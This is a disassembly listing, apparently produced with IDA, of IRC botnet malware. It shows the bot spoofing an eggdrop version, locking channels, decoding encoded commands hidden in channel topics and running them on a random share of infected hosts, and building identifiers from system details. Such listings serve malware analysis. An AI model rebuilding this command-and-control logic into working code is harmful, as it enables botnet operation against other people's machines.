push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call ds:dword_417108 ; lstrcmpA
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DB78
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EF18
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EF18
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41EE18
push offset dword_41DB88
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41F018
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41F018
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41F018
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EF18
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EF18
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EF18
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EF18
push [ebp+var_90]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EF18
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EF18
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: sub_40C93C+A8�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov ds:dword_41EA7C, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and ds:dword_41EA7C, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
